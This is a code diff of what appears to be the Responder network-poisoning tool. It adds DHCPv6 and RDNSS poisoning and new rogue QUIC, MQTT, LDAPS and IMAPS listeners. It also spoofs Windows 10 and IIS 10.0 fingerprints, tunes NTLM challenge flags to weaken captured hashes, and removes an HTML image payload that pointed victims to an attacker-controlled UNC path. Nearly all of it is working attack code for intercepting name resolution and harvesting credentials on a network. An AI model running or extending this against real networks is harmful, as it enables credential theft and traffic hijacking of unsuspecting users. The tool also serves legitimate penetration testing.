@@ -156,8 +456,9 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
#IPV6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if Have_IPv6:
mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
@@ -165,29 +466,36 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
if Have_IPv6:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
ThreadingUDPServer.allow_reuse_address = 1
ThreadingUDPServer.address_family = socket.AF_INET6
if Have_IPv6:
ThreadingUDPServer.address_family = socket.AF_INET6
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.address_family = socket.AF_INET6
if Have_IPv6:
ThreadingTCPServer.address_family = socket.AF_INET6
ThreadingUDPMDNSServer.allow_reuse_address = 1
ThreadingUDPMDNSServer.address_family = socket.AF_INET6
if Have_IPv6:
ThreadingUDPMDNSServer.address_family = socket.AF_INET6
ThreadingUDPLLMNRServer.allow_reuse_address = 1
ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
if Have_IPv6:
ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
ThreadingTCPServerAuth.allow_reuse_address = 1
ThreadingTCPServerAuth.address_family = socket.AF_INET6
if Have_IPv6:
ThreadingTCPServerAuth.address_family = socket.AF_INET6
def serve_thread_udp_broadcast(host, port, handler):
try:
@@ -224,6 +532,14 @@ def serve_thread_udp(host, port, handler):
except:
print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
def serve_thread_dhcpv6(host, port, handler):
try:
# MUST bind to :: to receive multicast packets
server = ThreadingUDPDHCPv6Server(('::', port), handler)
server.serve_forever()
except Exception as e:
print(color("[!] DHCPv6 error: %s" % str(e), 1, 1))
def serve_thread_tcp(host, port, handler):
try:
if OsInterfaceIsSupported():
@@ -270,20 +586,40 @@ def main():
if (sys.version_info < (3, 0)):
print(color('\n\n[-]', 3, 1) + " Still using python 2? :(")
print(color('\n[+]', 2, 1) + " Listening for events...\n")
threads = []
#IPv6 Poisoning
# DHCPv6 Server (disabled by default, enable with --dhcpv6)
if settings.Config.DHCPv6_On_Off:
from servers.DHCPv6 import DHCPv6
threads.append(Thread(target=serve_thread_dhcpv6, args=('', 547, DHCPv6,)))
# Load (M)DNS, NBNS and LLMNR Poisoners
from poisoners.LLMNR import LLMNR
from poisoners.NBTNS import NBTNS
from poisoners.MDNS import MDNS
threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
if settings.Config.RDNSS_On_Off or settings.Config.DNSSL_Domain:
from poisoners.RDNSS import RDNSS
threads.append(Thread(target=RDNSS, args=(
settings.Config.Interface, # 1. interface
settings.Config.RDNSS_On_Off, # 2. rdnss_enabled (bool)
settings.Config.DNSSL_Domain # 3. dnssl_domain (str or None)
)))
# Load MDNS, NBNS and LLMNR Poisoners
if settings.Config.LLMNR_On_Off:
from poisoners.LLMNR import LLMNR
threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
if settings.Config.NBTNS_On_Off:
from poisoners.NBTNS import NBTNS
threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
if settings.Config.MDNS_On_Off:
from poisoners.MDNS import MDNS
threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
#// Vintage Responder BOWSER module, now disabled by default.
#// Generate to much noise & easily detectable on the network when in analyze mode.
# Load Browser Listener
from servers.Browser import Browser
threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
#from servers.Browser import Browser
#threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
if settings.Config.HTTP_On_Off:
from servers.HTTP import HTTP
@@ -312,7 +648,7 @@ def main():
if settings.Config.WPAD_On_Off:
from servers.HTTP_Proxy import HTTP_Proxy
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3141, HTTP_Proxy,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
if settings.Config.ProxyAuth_On_Off:
from servers.Proxy_Auth import Proxy_Auth
@@ -328,6 +664,12 @@ def main():
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
if settings.Config.QUIC_On_Off:
from servers.QUIC import start_quic_server
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
threads.append(Thread(target=lambda: asyncio.run(start_quic_server(settings.Config.Bind_To, cert, key))))
if settings.Config.Krb_On_Off:
from servers.Kerberos import KerbTCP, KerbUDP
threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
@@ -349,8 +691,13 @@ def main():
if settings.Config.LDAP_On_Off:
from servers.LDAP import LDAP, CLDAP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,)))
threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))
if settings.Config.MQTT_On_Off:
from servers.MQTT import MQTT
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,)))
if settings.Config.SMTP_On_Off:
from servers.SMTP import ESMTP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25, ESMTP,)))
@@ -359,11 +706,14 @@ def main():
if settings.Config.IMAP_On_Off:
from servers.IMAP import IMAP
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))
from servers.IMAP import IMAPS
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 993, IMAPS,)))
if settings.Config.DNS_On_Off:
from servers.DNS import DNS, DNSTCP
threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
if settings.Config.SNMP_On_Off:
from servers.SNMP import SNMP
@@ -387,6 +737,14 @@ def main():
time.sleep(1)
except KeyboardInterrupt:
# Optional: Print DHCPv6 statistics on shutdown
if settings.Config.DHCPv6_On_Off:
try:
from servers.DHCPv6 import print_dhcpv6_stats
print_dhcpv6_stats()
except:
raise
pass
sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
if __name__ == '__main__':

336
packets.py Executable file → Normal file
View File

@@ -52,7 +52,7 @@ class NBT_Ans(Packet):
("NbtName", ""),
("Type", "\x00\x20"),
("Classy", "\x00\x01"),
("TTL", "\x00\x00\x00\xa5"),
("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior)
("Len", "\x00\x06"),
("Flags1", "\x00\x00"),
("IP", "\x00\x00\x00\x00"),
@@ -215,7 +215,7 @@ class DNS_SRV_Ans(Packet):
def calculate(self,data):
self.fields["Tid"] = data[0:2]
DNSName = ''.join(data[12:].split('\x00')[:1])
SplitFQDN = re.split('\W+', DNSName) # split the ldap.tcp.blah.blah.blah.domain.tld
SplitFQDN = re.split(r'\W+', DNSName) # split the ldap.tcp.blah.blah.blah.domain.tld
#What's the question? we need it first to calc all other len.
self.fields["QuestionName"] = DNSName
@@ -263,7 +263,7 @@ class LLMNR_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior)
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -292,7 +292,7 @@ class LLMNR6_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type1", "\x00\x1c"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior).
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -316,7 +316,7 @@ class MDNS_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -338,7 +338,7 @@ class MDNS6_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type", "\x00\x1c"),
("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -359,13 +359,13 @@ class NTLM_Challenge(Packet):
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("NegoFlags", "\x05\x02\x81\xa2" if settings.Config.NOESS_On_Off else "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
("TargetNameStr", settings.Config.Domain),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
@@ -426,25 +426,59 @@ class NTLM_Challenge(Packet):
class IIS_Auth_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("WWW-Auth", "WWW-Authenticate: Negotiate\r\n"),
("WWW-Auth2", "WWW-Authenticate: NTLM\r\n"),
("Len", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
"""),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class IIS_Auth_Granted(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\"+RespondWithIP()+"\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
("Payload", ""),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
@@ -452,22 +486,29 @@ class IIS_Auth_Granted(Packet):
class IIS_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWWAuth", "WWW-Authenticate: NTLM "),
("Payload", ""),
("Payload-CRLF", "\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload2", """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Not Authorized</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Not Authorized</h2>
<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>
</BODY></HTML>
"""),
])
def calculate(self,payload):
self.fields["Payload"] = b64encode(payload)
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload2"]))
class WinRM_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 \r\n"),
("Code", "HTTP/1.1 401\r\n"),
("WWWAuth", "WWW-Authenticate: Negotiate "),
("Payload", ""),
("Payload-CRLF", "\r\n"),
@@ -483,23 +524,54 @@ class WinRM_NTLM_Challenge_Ans(Packet):
class IIS_Basic_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Len", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
"""),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
##### Proxy mode Packets #####
class WPADScript(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerTlype", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
("Cache", "Pragma: no-cache\r\n"),
("Server", "Server: BigIP\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
@@ -514,7 +586,7 @@ class ServeExeFile(Packet):
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("Server", "Server: Microsoft-IIS/10.0\r\n"),
("ContentDisp", "Content-Disposition: attachment; filename="),
("ContentDiFile", ""),
("FileCRLF", ";\r\n"),
@@ -536,7 +608,7 @@ class ServeHtmlFile(Packet):
("ContentType", "Content-Type: text/html\r\n"),
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("Server", "Server: Microsoft-IIS/10.0\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
@@ -551,7 +623,7 @@ class ServeHtmlFile(Packet):
class WPAD_Auth_407_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
@@ -567,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet):
class WPAD_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWWAuth", "Proxy-Authenticate: NTLM "),
@@ -583,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet):
class WPAD_Basic_407_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
@@ -600,7 +672,7 @@ class WEBDAV_Options_Answer(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
("Len", "Content-Length: 0\r\n"),
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
@@ -688,7 +760,7 @@ class MSSQLNTLMChallengeAnswer(Packet):
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
("TargetNameStr", settings.Config.Domain),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
@@ -789,7 +861,7 @@ class IMAPGreeting(Packet):
class IMAPCapability(Packet):
fields = OrderedDict([
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM"),
("CRLF", "\r\n"),
])
@@ -800,6 +872,24 @@ class IMAPCapabilityEnd(Packet):
("CRLF", "\r\n"),
])
##### MQTT Packets #####
class MQTTv3v4ResponsePacket(Packet):
fields = OrderedDict([
("Type", "\x20"),
("Len", "\x02"),
("Session", "\x00"),
("Code", "\x04"),
])
class MQTTv5ResponsePacket(Packet):
fields = OrderedDict([
("Type", "\x20"),
("Len", "\x03"),
("Session", "\x00"),
("Code", "\x86"),
("Prop", "\x00"),
])
##### POP3 Packets #####
class POPOKPacket(Packet):
fields = OrderedDict([
@@ -945,9 +1035,9 @@ class LDAPNTLMChallenge(Packet):
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionHigh", "\x0a"),
("NegTokenInitSeqMechMessageVersionLow", "\x00"),
("NegTokenInitSeqMechMessageVersionBuilt", "\x7c\x4f"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", settings.Config.Domain),
@@ -1159,42 +1249,6 @@ class SMBSessionData(Packet):
self.fields["bcc"] = StructWithLenPython2or3("<h", len(CompleteBCC))
self.fields["PasswordLen"] = StructWithLenPython2or3("<h", len(str(self.fields["AccountPassword"])))
class SMBNegoFingerData(Packet):
fields = OrderedDict([
("separator1","\x02" ),
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2","\x02"),
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3","\x02"),
("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("separator4","\x02"),
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("separator5","\x02"),
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("separator6","\x02"),
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1",""),
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["bcc1"] = StructPython2or3('<h',self.fields["Data"])
class SMBTreeConnectData(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
@@ -1678,7 +1732,7 @@ class SMB2NegoAns(Packet):
("Signing", "\x01\x00"),
("Dialect", "\xff\x02"),
("Reserved", "\x00\x00"),
("Guid", "\xee\x85\xab\xf7\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x76\xa9"),
("Guid", urandom(16).decode('latin-1')),
("Capabilities", "\x07\x00\x00\x00"),
("MaxTransSize", "\x00\x00\x10\x00"),
("MaxReadSize", "\x00\x00\x10\x00"),
@@ -1701,9 +1755,9 @@ class SMB2NegoAns(Packet):
("NegTokenTag0ASNLen", "\x3c"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x3a"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x0a"),
("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
#("NegThisMech1ASNId", "\x06"),
#("NegThisMech1ASNLen", "\x0a"),
#("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
@@ -1732,14 +1786,14 @@ class SMB2NegoAns(Packet):
StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
